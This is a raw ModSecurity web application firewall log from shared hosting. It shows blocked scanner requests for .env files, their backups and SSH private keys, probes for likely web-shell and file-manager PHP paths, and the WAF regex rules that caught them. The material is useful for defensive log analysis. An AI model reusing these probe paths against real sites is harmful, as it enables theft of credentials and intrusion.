[Tue May 26 12:54:36.165051 2026] [security2:error] [pid 461618:tid 461807] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKs1yiSlSCHr1fdr20igAAAMA"]
[Tue May 26 12:54:36.329986 2026] [security2:error] [pid 461618:tid 461853] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtFyiSlSCHr1fdr20mwAAAO4"]
[Tue May 26 12:54:37.654646 2026] [security2:error] [pid 461618:tid 461865] [client 85.121.55.185:60522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.env"] [unique_id "ahVKtVyiSlSCHr1fdr203QAAAPo"]
[Tue May 26 12:54:37.656200 2026] [security2:error] [pid 461618:tid 461768] [client 85.121.55.185:60544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/api/.env"] [unique_id "ahVKtVyiSlSCHr1fdr204wAAAJk"]
[Tue May 26 12:54:37.657121 2026] [security2:error] [pid 461618:tid 461830] [client 85.121.55.185:60552] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/public/.env"] [unique_id "ahVKtVyiSlSCHr1fdr205AAAANc"]
[Tue May 26 12:54:37.658539 2026] [security2:error] [pid 461618:tid 461864] [client 85.121.55.185:60548] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/backend/.env"] [unique_id "ahVKtVyiSlSCHr1fdr204QAAAPk"]
[Tue May 26 12:54:37.683526 2026] [security2:error] [pid 461618:tid 461786] [client 85.121.55.185:60558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVKtVyiSlSCHr1fdr208QAAAKs"]
[Tue May 26 12:54:37.767701 2026] [security2:error] [pid 461618:tid 461849] [client 85.121.55.185:60580] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr203wAAAOo"]
[Tue May 26 12:54:37.783580 2026] [security2:error] [pid 461618:tid 461825] [client 85.121.55.185:60574] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr207QAAANI"]
[Tue May 26 12:54:37.784152 2026] [security2:error] [pid 461618:tid 461804] [client 85.121.55.185:60578] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr207AAAAL0"]
[Tue May 26 12:54:37.784243 2026] [security2:error] [pid 461618:tid 461773] [client 85.121.55.185:60568] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr203gAAAJ4"]
[Tue May 26 12:54:37.790184 2026] [security2:error] [pid 461618:tid 461821] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr206QAAAM4"]
[Tue May 26 12:54:37.792057 2026] [security2:error] [pid 461618:tid 461846] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr206AAAAOc"]
[Tue May 26 12:54:37.815825 2026] [security2:error] [pid 461618:tid 461851] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr209AAAAOw"]
[Tue May 26 12:54:37.816744 2026] [security2:error] [pid 461618:tid 461861] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr209QAAAPY"]
[Tue May 26 12:54:37.830353 2026] [security2:error] [pid 461618:tid 461786] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr208wAAAKs"]
[Tue May 26 12:54:38.171366 2026] [security2:error] [pid 461618:tid 461794] [client 85.121.55.185:60554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVKtlyiSlSCHr1fdr21BwAAALM"]
[Tue May 26 12:54:38.183896 2026] [security2:error] [pid 461618:tid 461763] [client 85.121.55.185:60536] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.env.old"] [unique_id "ahVKtlyiSlSCHr1fdr21FgAAAJQ"]
[Tue May 26 12:54:38.189660 2026] [security2:error] [pid 461618:tid 461823] [client 85.121.55.185:60534] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.env.bak"] [unique_id "ahVKtlyiSlSCHr1fdr21FAAAANA"]
[Tue May 26 12:54:38.197302 2026] [security2:error] [pid 461618:tid 461852] [client 85.121.55.185:60532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.env.backup"] [unique_id "ahVKtlyiSlSCHr1fdr21MQAAAO0"]
[Tue May 26 12:54:38.197756 2026] [security2:error] [pid 461618:tid 461749] [client 85.121.55.185:60550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/app/.env"] [unique_id "ahVKtlyiSlSCHr1fdr21LwAAAIY"]
[Tue May 26 12:54:38.268953 2026] [security2:error] [pid 461618:tid 461860] [client 20.9.81.163:9613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVKtlyiSlSCHr1fdr21PgAAAPU"]
[Tue May 26 12:54:38.269106 2026] [security2:error] [pid 461618:tid 461860] [client 20.9.81.163:9613] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVKtlyiSlSCHr1fdr21PgAAAPU"]
[Tue May 26 12:54:38.311377 2026] [security2:error] [pid 461618:tid 461853] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21BAAAAO4"]
[Tue May 26 12:54:38.319863 2026] [security2:error] [pid 461618:tid 461857] [client 85.121.55.185:60560] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21FwAAAPI"]
[Tue May 26 12:54:38.321747 2026] [security2:error] [pid 461618:tid 461865] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21KwAAAPo"]
[Tue May 26 12:54:38.331677 2026] [security2:error] [pid 461618:tid 461757] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21EQAAAI4"]
[Tue May 26 12:54:38.335648 2026] [security2:error] [pid 461618:tid 461778] [client 85.121.55.185:60510] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21EwAAAKM"]
[Tue May 26 12:54:38.352083 2026] [security2:error] [pid 461618:tid 461781] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21FQAAAKY"]
[Tue May 26 12:54:38.352664 2026] [security2:error] [pid 461618:tid 461847] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21NAAAAOg"]
[Tue May 26 12:54:38.355528 2026] [security2:error] [pid 461618:tid 461795] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21HgAAALQ"]
[Tue May 26 12:54:38.357292 2026] [security2:error] [pid 461618:tid 461766] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21JQAAAJc"]
[Tue May 26 12:54:38.359816 2026] [security2:error] [pid 461618:tid 461834] [client 85.121.55.185:60514] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21EgAAANs"]
[Tue May 26 12:54:38.361120 2026] [security2:error] [pid 461618:tid 461768] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21JgAAAJk"]
[Tue May 26 12:54:38.368966 2026] [security2:error] [pid 461618:tid 461835] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21NQAAANw"]
[Tue May 26 12:54:38.369034 2026] [security2:error] [pid 461618:tid 461774] [client 85.121.55.185:60572] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21LQAAAJ8"]
[Tue May 26 12:54:38.376154 2026] [security2:error] [pid 461618:tid 461765] [client 85.121.55.185:60582] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21MgAAAJY"]
[Tue May 26 12:54:38.386355 2026] [security2:error] [pid 461618:tid 461855] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21JwAAAPA"]
[Tue May 26 12:54:38.391375 2026] [security2:error] [pid 461618:tid 461748] [client 85.121.55.185:60570] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21LgAAAIU"]
[Tue May 26 12:54:38.393493 2026] [security2:error] [pid 461618:tid 461753] [client 85.121.55.185:60576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21RwAAAIo"]
[Tue May 26 12:54:38.393871 2026] [security2:error] [pid 461618:tid 461801] [client 20.9.81.163:31447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/admin.php"] [unique_id "ahVKtlyiSlSCHr1fdr21SQAAALo"]
[Tue May 26 12:54:38.393951 2026] [security2:error] [pid 461618:tid 461801] [client 20.9.81.163:31447] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/admin.php"] [unique_id "ahVKtlyiSlSCHr1fdr21SQAAALo"]
[Tue May 26 12:54:38.398305 2026] [security2:error] [pid 461618:tid 461849] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21QAAAAOo"]
[Tue May 26 12:54:38.398828 2026] [security2:error] [pid 461618:tid 461818] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21PQAAAMs"]
[Tue May 26 12:54:38.399052 2026] [security2:error] [pid 461618:tid 461814] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21PAAAAMc"]
[Tue May 26 12:54:38.405921 2026] [security2:error] [pid 461618:tid 461825] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21QwAAANI"]
[Tue May 26 12:54:38.406347 2026] [security2:error] [pid 461618:tid 461862] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21QQAAAPc"]
[Tue May 26 12:54:38.412323 2026] [security2:error] [pid 461618:tid 461870] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21RgAAAP8"]
[Tue May 26 12:54:38.535231 2026] [security2:error] [pid 461618:tid 461764] [client 20.9.81.163:38008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/inputs.php"] [unique_id "ahVKtlyiSlSCHr1fdr21SgAAAJU"]
[Tue May 26 12:54:38.535377 2026] [security2:error] [pid 461618:tid 461764] [client 20.9.81.163:38008] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/inputs.php"] [unique_id "ahVKtlyiSlSCHr1fdr21SgAAAJU"]
[Tue May 26 12:54:38.675914 2026] [security2:error] [pid 461618:tid 461815] [client 20.9.81.163:32720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/file.php"] [unique_id "ahVKtlyiSlSCHr1fdr21TgAAAMg"]
[Tue May 26 12:54:38.676053 2026] [security2:error] [pid 461618:tid 461815] [client 20.9.81.163:32720] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/file.php"] [unique_id "ahVKtlyiSlSCHr1fdr21TgAAAMg"]
[Tue May 26 12:54:38.829939 2026] [security2:error] [pid 461618:tid 461844] [client 20.9.81.163:34046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/ms-edit.php"] [unique_id "ahVKtlyiSlSCHr1fdr21VQAAAOU"]
[Tue May 26 12:54:38.830114 2026] [security2:error] [pid 461618:tid 461844] [client 20.9.81.163:34046] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/ms-edit.php"] [unique_id "ahVKtlyiSlSCHr1fdr21VQAAAOU"]
[Tue May 26 12:54:39.025342 2026] [security2:error] [pid 461618:tid 461841] [client 20.9.81.163:34008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/simple.php"] [unique_id "ahVKt1yiSlSCHr1fdr21WQAAAOI"]
[Tue May 26 12:54:39.025461 2026] [security2:error] [pid 461618:tid 461841] [client 20.9.81.163:34008] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/simple.php"] [unique_id "ahVKt1yiSlSCHr1fdr21WQAAAOI"]
[Tue May 26 12:54:39.229279 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:34038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/bgymj.php"] [unique_id "ahVKt1yiSlSCHr1fdr21YgAAAJk"]
[Tue May 26 12:54:39.229382 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:34038] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/bgymj.php"] [unique_id "ahVKt1yiSlSCHr1fdr21YgAAAJk"]
[Tue May 26 12:54:39.365409 2026] [security2:error] [pid 461618:tid 461847] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21WAAAAOg"]
[Tue May 26 12:54:39.374326 2026] [security2:error] [pid 461618:tid 461756] [client 20.9.81.163:29886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVKt1yiSlSCHr1fdr21agAAAI0"]
[Tue May 26 12:54:39.374426 2026] [security2:error] [pid 461618:tid 461756] [client 20.9.81.163:29886] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVKt1yiSlSCHr1fdr21agAAAI0"]
[Tue May 26 12:54:39.511221 2026] [security2:error] [pid 461618:tid 461748] [client 20.9.81.163:1274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/404.php"] [unique_id "ahVKt1yiSlSCHr1fdr21bgAAAIU"]
[Tue May 26 12:54:39.511400 2026] [security2:error] [pid 461618:tid 461748] [client 20.9.81.163:1274] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/404.php"] [unique_id "ahVKt1yiSlSCHr1fdr21bgAAAIU"]
[Tue May 26 12:54:39.655834 2026] [security2:error] [pid 461618:tid 461840] [client 20.9.81.163:31425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/file3.php"] [unique_id "ahVKt1yiSlSCHr1fdr21bwAAAOE"]
